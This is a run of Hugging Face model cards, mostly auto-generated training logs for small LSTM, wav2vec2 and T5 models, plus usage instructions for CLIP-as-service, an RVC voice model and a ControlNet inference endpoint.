## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 0
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7917 | 0.03 | 76320 | 4.7594 |
| 4.5052 | 1.03 | 152640 | 4.4768 |
| 4.3619 | 0.03 | 228960 | 4.3418 |
| 4.2784 | 1.03 | 305280 | 4.2583 |
| 4.2153 | 0.03 | 381600 | 4.2016 |
| 4.1661 | 1.03 | 457920 | 4.1610 |
| 4.1274 | 0.03 | 534240 | 4.1302 |
| 4.0963 | 1.03 | 610560 | 4.1061 |
| 4.0684 | 0.03 | 686880 | 4.0865 |
| 4.0431 | 0.03 | 763200 | 4.0708 |
| 4.0215 | 1.03 | 839520 | 4.0574 |
| 4.0052 | 0.03 | 915840 | 4.0466 |
| 3.9894 | 1.03 | 992160 | 4.0375 |
| 3.9699 | 0.03 | 1068480 | 4.0294 |
| 3.9579 | 1.03 | 1144800 | 4.0223 |
| 3.9457 | 0.03 | 1221120 | 4.0157 |
| 3.9351 | 1.03 | 1297440 | 4.0102 |
| 3.9247 | 0.03 | 1373760 | 4.0058 |
| 3.915 | 1.03 | 1450080 | 4.0019 |
| 3.9127 | 0.03 | 1526400 | 3.9982 |
| 3.9078 | 1.03 | 1602720 | 3.9946 |
| 3.9007 | 0.03 | 1679040 | 3.9920 |
| 3.8952 | 1.03 | 1755360 | 3.9902 |
| 3.8918 | 0.03 | 1831680 | 3.9876 |
| 3.8848 | 1.03 | 1908000 | 3.9858 |
| 3.8768 | 0.03 | 1984320 | 3.9841 |
| 3.8712 | 1.03 | 2060640 | 3.9824 |
| 3.8673 | 0.03 | 2136960 | 3.9810 |
| 3.8644 | 1.03 | 2213280 | 3.9792 |
| 3.8548 | 0.03 | 2289600 | 3.9779 |
| 3.851 | 1.03 | 2365920 | 3.9768 |
| 3.8478 | 0.03 | 2442240 | 3.9759 |
| 3.8441 | 1.03 | 2518560 | 3.9752 |
| 3.8411 | 0.03 | 2594880 | 3.9744 |
| 3.8374 | 1.03 | 2671200 | 3.9737 |
| 3.8405 | 0.03 | 2747520 | 3.9732 |
| 3.8411 | 1.03 | 2823840 | 3.9727 |
| 3.8386 | 0.03 | 2900160 | 3.9721 |
| 3.8389 | 1.03 | 2976480 | 3.9716 |
| 3.8384 | 0.02 | 3052726 | 3.9713 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
jinaai/clip-models | jinaai | 2024-01-22T06:32:06Z | 0 | 4 | null | [
"onnx",
"license:apache-2.0",
"region:eu"
] | null | 2023-12-29T07:32:10Z | ---
license: apache-2.0
---
# Welcome to CLIP-as-service!
[GitHub: clip-as-service](https://github.com/jina-ai/clip-as-service)
[Docs: clip-as-service](https://clip-as-service.jina.ai/#)
CLIP-as-service is a low-latency high-scalability service for embedding images and text. It can be easily integrated as a microservice into neural search solutions.
⚡ Fast: Serve CLIP models with TensorRT, ONNX runtime and PyTorch w/o JIT with 800QPS[*]. Non-blocking duplex streaming on requests and responses, designed for large data and long-running tasks.
🫐 Elastic: Horizontally scale up and down multiple CLIP models on single GPU, with automatic load balancing.
🐥 Easy-to-use: No learning curve, minimalist design on client and server. Intuitive and consistent API for image and sentence embedding.
👒 Modern: Async client support. Easily switch between gRPC, HTTP, WebSocket protocols with TLS and compression.
🍱 Integration: Smooth integration with neural search ecosystem including Jina and DocArray. Build cross-modal and multi-modal solutions in no time.
[*] with default config (single replica, PyTorch no JIT) on GeForce RTX 3090.
## Try it!
## Install
[PyPI](https://img.shields.io/pypi/v/clip_client?color=%23ffffff&label=%20) is the latest version.
Make sure you are using Python 3.7+. You can install the client and server independently. It is **not required** to install both: e.g. you can install `clip_server` on a GPU machine and `clip_client` on a local laptop.
Client
```bash
pip install clip-client
```
Server (PyTorch)
```
pip install clip-server
```
Server (ONNX)
```
pip install "clip_server[onnx]"
```
Server (TensorRT)
```
pip install nvidia-pyindex
pip install "clip_server[tensorrt]"
```
Server on [Google Colab](https://colab.research.google.com/github/jina-ai/clip-as-service/blob/main/docs/hosting/cas-on-colab.ipynb)
## Quick check
After installing, you can run the following commands for a quick connectivity check.
### Start the server
Start PyTorch Server
```bash
python -m clip_server
```
Start ONNX Server
```bash
python -m clip_server onnx-flow.yml
```
Start TensorRT Server
```bash
python -m clip_server tensorrt-flow.yml
```
At the first time starting the server, it will download the default pretrained model, which may take a while depending on your network speed. Then you will get the address information similar to the following:
```text
╭────────────── 🔗 Endpoint ───────────────╮
│ 🔗 Protocol GRPC │
│ 🏠 Local 0.0.0.0:51000 │
│ 🔒 Private 192.168.31.62:51000 │
| 🌍 Public 87.105.159.191:51000 |
╰──────────────────────────────────────────╯
```
This means the server is ready to serve. Note down the three addresses shown above, you will need them later.
### Connect from client
```{tip}
Depending on the location of the client and server. You may use different IP addresses:
- Client and server are on the same machine: use local address, e.g. `0.0.0.0`
- Client and server are connected to the same router: use private network address, e.g. `192.168.3.62`
- Server is in public network: use public network address, e.g. `87.105.159.191`
```
Run the following Python script:
```python
from clip_client import Client
c = Client('grpc://0.0.0.0:51000')
c.profile()
```
will give you:
```text
Roundtrip 16ms 100%
├── Client-server network 8ms 49%
└── Server 8ms 51%
├── Gateway-CLIP network 2ms 25%
└── CLIP model 6ms 75%
{'Roundtrip': 15.684750003856607, 'Client-server network': 7.684750003856607, 'Server': 8, 'Gateway-CLIP network': 2, 'CLIP model': 6}
```
It means the client and the server are now connected. Well done! |
jaswanthrk/tokenizer_BPE_16k_vocab_all_data | jaswanthrk | 2024-01-22T06:29:34Z | 0 | 0 | transformers | [
"transformers",
"license:llama2",
"endpoints_compatible",
"region:us"
] | null | 2024-01-21T19:03:20Z | ---
license: llama2
library_name: transformers
--- |
codewizardUV/comp_comp_dataset | codewizardUV | 2024-01-22T06:26:48Z | 0 | 0 | null | [
"tensorboard",
"safetensors",
"trl",
"sft",
"generated_from_trainer",
"base_model:HuggingFaceH4/zephyr-7b-beta",
"base_model:finetune:HuggingFaceH4/zephyr-7b-beta",
"license:mit",
"region:us"
] | null | 2024-01-22T06:26:16Z | ---
license: mit
base_model: HuggingFaceH4/zephyr-7b-beta
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: results
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# results
This model is a fine-tuned version of [HuggingFaceH4/zephyr-7b-beta](https://huggingface.co/HuggingFaceH4/zephyr-7b-beta) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.5273
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.00025
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: constant
- lr_scheduler_warmup_ratio: 0.03
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| 1.1126 | 0.38 | 50 | 0.9045 |
| 0.781 | 0.76 | 100 | 0.7953 |
| 0.6092 | 1.14 | 150 | 0.6737 |
| 0.5484 | 1.52 | 200 | 0.6842 |
| 0.5078 | 1.89 | 250 | 0.5686 |
| 0.3905 | 2.27 | 300 | 0.6194 |
| 0.4328 | 2.65 | 350 | 0.5543 |
| 0.3872 | 3.03 | 400 | 0.5406 |
| 0.3147 | 3.41 | 450 | 0.5504 |
| 0.3327 | 3.79 | 500 | 0.5473 |
| 0.2734 | 4.17 | 550 | 0.5514 |
| 0.2972 | 4.55 | 600 | 0.5327 |
| 0.2974 | 4.92 | 650 | 0.5273 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
dendimaki/bert-finetuned-locations | dendimaki | 2024-01-22T06:13:40Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"dataset:dendimaki/apeiron-locations",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-20T05:01:33Z | ---
license: apache-2.0
base_model: bert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: bert-finetuned-locations
results: []
datasets:
- dendimaki/apeiron-locations
metrics:
- accuracy
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# bert-finetuned-locations
This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3.0
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0 |
CLMBR/binding-reconstruction-lstm-4 | CLMBR | 2024-01-22T06:08:15Z | 3 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:51:00Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-reconstruction-lstm-4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-reconstruction-lstm-4
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9711
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7992 | 0.03 | 76320 | 4.7644 |
| 4.5125 | 1.03 | 152640 | 4.4847 |
| 4.3702 | 0.03 | 228960 | 4.3492 |
| 4.2826 | 1.03 | 305280 | 4.2646 |
| 4.2213 | 0.03 | 381600 | 4.2080 |
| 4.1709 | 1.03 | 457920 | 4.1664 |
| 4.1309 | 0.03 | 534240 | 4.1344 |
| 4.0996 | 1.03 | 610560 | 4.1099 |
| 4.0726 | 0.03 | 686880 | 4.0901 |
| 4.0467 | 0.03 | 763200 | 4.0744 |
| 4.0258 | 1.03 | 839520 | 4.0606 |
| 4.0085 | 0.03 | 915840 | 4.0495 |
| 3.9942 | 0.03 | 992160 | 4.0401 |
| 3.9738 | 1.03 | 1068480 | 4.0315 |
| 3.9598 | 0.03 | 1144800 | 4.0241 |
| 3.9496 | 1.03 | 1221120 | 4.0183 |
| 3.9373 | 0.03 | 1297440 | 4.0131 |
| 3.9283 | 1.03 | 1373760 | 4.0088 |
| 3.9186 | 0.03 | 1450080 | 4.0037 |
| 3.9159 | 1.03 | 1526400 | 4.0002 |
| 3.9113 | 0.03 | 1602720 | 3.9975 |
| 3.9049 | 1.03 | 1679040 | 3.9944 |
| 3.8979 | 0.03 | 1755360 | 3.9918 |
| 3.8934 | 1.03 | 1831680 | 3.9899 |
| 3.8865 | 0.03 | 1908000 | 3.9874 |
| 3.8783 | 1.03 | 1984320 | 3.9855 |
| 3.8751 | 0.03 | 2060640 | 3.9838 |
| 3.8705 | 1.03 | 2136960 | 3.9821 |
| 3.865 | 0.03 | 2213280 | 3.9805 |
| 3.8558 | 1.03 | 2289600 | 3.9784 |
| 3.8509 | 0.03 | 2365920 | 3.9774 |
| 3.8505 | 1.03 | 2442240 | 3.9761 |
| 3.8449 | 0.03 | 2518560 | 3.9752 |
| 3.8438 | 1.03 | 2594880 | 3.9743 |
| 3.8394 | 0.03 | 2671200 | 3.9737 |
| 3.8414 | 1.03 | 2747520 | 3.9730 |
| 3.8425 | 0.03 | 2823840 | 3.9724 |
| 3.8403 | 1.03 | 2900160 | 3.9719 |
| 3.8389 | 0.03 | 2976480 | 3.9715 |
| 3.8378 | 1.02 | 3052726 | 3.9711 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
yesj1234/zhko_xlsr_100p_sup_a100 | yesj1234 | 2024-01-22T06:02:21Z | 7 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"./train_dataset_sup.py",
"generated_from_trainer",
"base_model:facebook/wav2vec2-large-xlsr-53",
"base_model:finetune:facebook/wav2vec2-large-xlsr-53",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-01-22T05:46:51Z | ---
base_model: facebook/wav2vec2-large-xlsr-53
tags:
- automatic-speech-recognition
- ./train_dataset_sup.py
- generated_from_trainer
model-index:
- name: finetuned_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuned_model
This model is a fine-tuned version of [facebook/wav2vec2-large-xlsr-53](https://huggingface.co/facebook/wav2vec2-large-xlsr-53) on the ./TRAIN_DATASET_SUP.PY - NA dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- distributed_type: multi-GPU
- num_devices: 2
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- total_eval_batch_size: 16
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 1000
- num_epochs: 30
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
CLMBR/binding-case-lstm-2 | CLMBR | 2024-01-22T06:01:02Z | 6 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T20:26:42Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-case-lstm-2
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-case-lstm-2
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9732
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 2
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7896 | 0.03 | 76320 | 4.7570 |
| 4.5056 | 1.03 | 152640 | 4.4776 |
| 4.3639 | 0.03 | 228960 | 4.3428 |
| 4.2748 | 1.03 | 305280 | 4.2598 |
| 4.2152 | 0.03 | 381600 | 4.2038 |
| 4.1683 | 0.03 | 457920 | 4.1630 |
| 4.1315 | 1.03 | 534240 | 4.1321 |
| 4.0972 | 0.03 | 610560 | 4.1075 |
| 4.071 | 0.03 | 686880 | 4.0878 |
| 4.0465 | 1.03 | 763200 | 4.0719 |
| 4.0256 | 0.03 | 839520 | 4.0583 |
| 4.0112 | 1.03 | 915840 | 4.0480 |
| 3.9916 | 0.03 | 992160 | 4.0378 |
| 3.9742 | 1.03 | 1068480 | 4.0300 |
| 3.9673 | 0.03 | 1144800 | 4.0234 |
| 3.9429 | 1.03 | 1221120 | 4.0180 |
| 3.9312 | 0.03 | 1297440 | 4.0124 |
| 3.9237 | 1.03 | 1373760 | 4.0079 |
| 3.9162 | 0.03 | 1450080 | 4.0047 |
| 3.9118 | 1.03 | 1526400 | 4.0011 |
| 3.9087 | 0.03 | 1602720 | 3.9978 |
| 3.9046 | 1.03 | 1679040 | 3.9952 |
| 3.8998 | 0.03 | 1755360 | 3.9928 |
| 3.8938 | 1.03 | 1831680 | 3.9903 |
| 3.8883 | 0.03 | 1908000 | 3.9883 |
| 3.8836 | 1.03 | 1984320 | 3.9859 |
| 3.8759 | 0.03 | 2060640 | 3.9840 |
| 3.8724 | 1.03 | 2136960 | 3.9824 |
| 3.8654 | 0.03 | 2213280 | 3.9808 |
| 3.8605 | 1.03 | 2289600 | 3.9793 |
| 3.8586 | 0.03 | 2365920 | 3.9784 |
| 3.8453 | 1.03 | 2442240 | 3.9775 |
| 3.8408 | 0.03 | 2518560 | 3.9766 |
| 3.8392 | 1.03 | 2594880 | 3.9762 |
| 3.8369 | 0.03 | 2671200 | 3.9754 |
| 3.8385 | 1.03 | 2747520 | 3.9749 |
| 3.8411 | 0.03 | 2823840 | 3.9744 |
| 3.84 | 0.03 | 2900160 | 3.9740 |
| 3.8412 | 1.03 | 2976480 | 3.9735 |
| 3.842 | 0.02 | 3052726 | 3.9732 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
CLMBR/binding-domain-lstm-0 | CLMBR | 2024-01-22T05:54:34Z | 1 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:42:02Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-lstm-0
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-lstm-0
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9735
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 0
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7977 | 0.03 | 76320 | 4.7615 |
| 4.5122 | 1.03 | 152640 | 4.4804 |
| 4.3702 | 0.03 | 228960 | 4.3456 |
| 4.2828 | 1.03 | 305280 | 4.2622 |
| 4.2219 | 0.03 | 381600 | 4.2056 |
| 4.1741 | 1.03 | 457920 | 4.1638 |
| 4.1361 | 0.03 | 534240 | 4.1324 |
| 4.1019 | 1.03 | 610560 | 4.1074 |
| 4.0734 | 0.03 | 686880 | 4.0879 |
| 4.0511 | 1.03 | 763200 | 4.0719 |
| 4.0305 | 0.03 | 839520 | 4.0593 |
| 4.0145 | 1.03 | 915840 | 4.0479 |
| 3.9977 | 0.03 | 992160 | 4.0387 |
| 3.9796 | 1.03 | 1068480 | 4.0308 |
| 3.9665 | 0.03 | 1144800 | 4.0227 |
| 3.953 | 1.03 | 1221120 | 4.0167 |
| 3.9407 | 0.03 | 1297440 | 4.0120 |
| 3.9301 | 1.03 | 1373760 | 4.0081 |
| 3.9233 | 0.03 | 1450080 | 4.0040 |
| 3.919 | 1.03 | 1526400 | 4.0004 |
| 3.9145 | 0.03 | 1602720 | 3.9975 |
| 3.9119 | 1.03 | 1679040 | 3.9947 |
| 3.9048 | 0.03 | 1755360 | 3.9919 |
| 3.8974 | 1.03 | 1831680 | 3.9893 |
| 3.8909 | 0.03 | 1908000 | 3.9872 |
| 3.8852 | 1.03 | 1984320 | 3.9859 |
| 3.8798 | 0.03 | 2060640 | 3.9846 |
| 3.8767 | 1.03 | 2136960 | 3.9831 |
| 3.8729 | 0.03 | 2213280 | 3.9818 |
| 3.8653 | 1.03 | 2289600 | 3.9808 |
| 3.86 | 0.03 | 2365920 | 3.9796 |
| 3.8572 | 1.03 | 2442240 | 3.9786 |
| 3.8499 | 0.03 | 2518560 | 3.9776 |
| 3.8451 | 1.03 | 2594880 | 3.9767 |
| 3.8444 | 0.03 | 2671200 | 3.9761 |
| 3.8457 | 1.03 | 2747520 | 3.9753 |
| 3.8482 | 0.03 | 2823840 | 3.9746 |
| 3.848 | 1.03 | 2900160 | 3.9742 |
| 3.8472 | 0.03 | 2976480 | 3.9737 |
| 3.8448 | 1.02 | 3052726 | 3.9735 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
varunsamalaNEU/taxi | varunsamalaNEU | 2024-01-22T05:49:08Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2024-01-22T05:41:44Z | ---
tags:
- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: taxi
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.50 +/- 2.76
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing1 **FrozenLake-v1**
This is a trained model of a **Q-Learning** agent playing **FrozenLake-v1** .
## Usage
```python
model = load_from_hub(repo_id="varunsamalaNEU/taxi", filename="q-learning.pkl")
# Don't forget to check if you need to add additional attributes (is_slippery=False etc)
env = gym.make(model["env_id"])
```
|
yesj1234/jako_xlsr_100p_sup_a100 | yesj1234 | 2024-01-22T05:44:30Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"./train_dataset_sup.py",
"generated_from_trainer",
"base_model:facebook/wav2vec2-large-xlsr-53",
"base_model:finetune:facebook/wav2vec2-large-xlsr-53",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-01-22T05:29:37Z | ---
base_model: facebook/wav2vec2-large-xlsr-53
tags:
- automatic-speech-recognition
- ./train_dataset_sup.py
- generated_from_trainer
model-index:
- name: finetuned_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# finetuned_model
This model is a fine-tuned version of [facebook/wav2vec2-large-xlsr-53](https://huggingface.co/facebook/wav2vec2-large-xlsr-53) on the ./TRAIN_DATASET_SUP.PY - NA dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- distributed_type: multi-GPU
- num_devices: 2
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- total_eval_batch_size: 16
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 1000
- num_epochs: 30
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC | PhoenixStormJr | 2024-01-22T05:27:20Z | 0 | 0 | null | [
"license:mit",
"region:us"
] | null | 2024-01-22T05:16:41Z | ---
license: mit
---

This is Ms. Mari's's voice from Megaman NT Warrior. This was created with RVC V2, by Rejekts, trained on 300 epochs. If you would like to use the model, go here:
https://huggingface.co/PhoenixStormJr/RVC-V2-easy-gui-tutorial
Unfortunately, Ms. Mari doesn't talk much. Therefore, I had to use Tortoise-TTS, to generate extra speech for Ms. Mari I am NOT going to sit through hours of footage searching for ONE characters voice. If you would like a better model, you go on ahead, and cut the sections of Ms. Mari's voice using audacity, or any other audio editing software, and upload the .wav file here. I will remove the background noise, enhance the audio, and train the model all myself, but I will NOT spend hours looking for Ms. Mari's voice. I need at least 6 minutes of Ms. Mari's speech to train the model.
Download Zip model here:
https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/MsMari.zip?download=true
Download .pth file here:
https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/MsMari.pth?download=true
Download .index here:
https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/added_IVF433_Flat_nprobe_1_MsMari_v2.index?download=true
Listen to a sample audio here:
<audio controls src="https://huggingface.co/PhoenixStormJr/Megaman-NT-Warrior-Ms-Mari-RVC/resolve/main/MsMariSample.wav"></audio> |
thangvip/vi-t5-reward-model-6-epochs | thangvip | 2024-01-22T05:10:52Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text-classification",
"generated_from_trainer",
"base_model:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"base_model:finetune:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T05:10:13Z | ---
license: mit
base_model: thangvip/vi-t5-base-finetune-rewriter-5-epochs
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: vi-t5-reward-model-6-epochs
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vi-t5-reward-model-6-epochs
This model is a fine-tuned version of [thangvip/vi-t5-base-finetune-rewriter-5-epochs](https://huggingface.co/thangvip/vi-t5-base-finetune-rewriter-5-epochs) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4914
- Accuracy: 0.8106
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1.41e-05
- train_batch_size: 32
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 6
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
Charles-Elena/ControlNet-endpoint | Charles-Elena | 2024-01-22T05:05:21Z | 0 | 0 | null | [
"stable-diffusion",
"stable-diffusion-diffusers",
"controlnet",
"endpoints-template",
"arxiv:2302.05543",
"license:openrail",
"endpoints_compatible",
"region:us"
] | null | 2024-01-19T13:56:16Z | ---
license: openrail
tags:
- stable-diffusion
- stable-diffusion-diffusers
- controlnet
- endpoints-template
thumbnail: "https://huggingface.co/philschmid/ControlNet-endpoint/resolve/main/thumbnail.png"
inference: true
---
# Inference Endpoint for [ControlNet](https://huggingface.co/lllyasviel/ControlNet) using [runwayml/stable-diffusion-v1-5](https://huggingface.co/runwayml/stable-diffusion-v1-5)
> ControlNet is a neural network structure to control diffusion models by adding extra conditions.
> Official repository: https://github.com/lllyasviel/ControlNet
---
Blog post: [Controlled text to image generation with Inference Endpoints]()
This repository implements a custom `handler` task for `controlled text-to-image` generation on 🤗 Inference Endpoints. The code for the customized pipeline is in the [handler.py](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/handler.py).
There is also a [notebook](https://huggingface.co/philschmid/ControlNet-endpoint/blob/main/create_handler.ipynb) included, on how to create the `handler.py`

### expected Request payload
```json
{
"inputs": "A prompt used for image generation",
"negative_prompt": "low res, bad anatomy, worst quality, low quality",
"controlnet_type": "depth",
"image" : "iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAIAAAB7GkOtAAAABGdBTUEAALGPC",
}
```
supported `controlnet_type` are: `canny_edge`, `pose`, `depth`, `scribble`, `segmentation`, `normal`, `hed`, `hough`
below is an example on how to run a request using Python and `requests`.
## Use Python to send requests
1. Get image
```
wget https://huggingface.co/datasets/diffusers/test-arrays/resolve/main/stable_diffusion_imgvar/input_image_vermeer.png
```
2. Use the following code to send a request to the endpoint
```python
import json
from typing import List
import requests as r
import base64
from PIL import Image
from io import BytesIO
ENDPOINT_URL = "" # your endpoint url
HF_TOKEN = "" # your huggingface token `hf_xxx`
# helper image utils
def encode_image(image_path):
with open(image_path, "rb") as i:
b64 = base64.b64encode(i.read())
return b64.decode("utf-8")
def predict(prompt, image, negative_prompt=None, controlnet_type = "normal"):
image = encode_image(image)
# prepare sample payload
request = {"inputs": prompt, "image": image, "negative_prompt": negative_prompt, "controlnet_type": controlnet_type}
# headers
headers = {
"Authorization": f"Bearer {HF_TOKEN}",
"Content-Type": "application/json",
"Accept": "image/png" # important to get an image back
}
response = r.post(ENDPOINT_URL, headers=headers, json=request)
if response.status_code != 200:
print(response.text)
raise Exception("Prediction failed")
img = Image.open(BytesIO(response.content))
return img
prediction = predict(
prompt = "cloudy sky background lush landscape house and green trees, RAW photo (high detailed skin:1.2), 8k uhd, dslr, soft lighting, high quality, film grain, Fujifilm XT3",
negative_prompt ="lowres, bad anatomy, worst quality, low quality, city, traffic",
controlnet_type = "hed",
image = "huggingface.png"
)
prediction.save("result.png")
```
```
expected output

[Adding Conditional Control to Text-to-Image Diffusion Models](https://arxiv.org/abs/2302.05543) by Lvmin Zhang and Maneesh Agrawala.
Using the pretrained models we can provide control images (for example, a depth map) to control Stable Diffusion text-to-image generation so that it follows the structure of the depth image and fills in the details.
The abstract of the paper is the following:
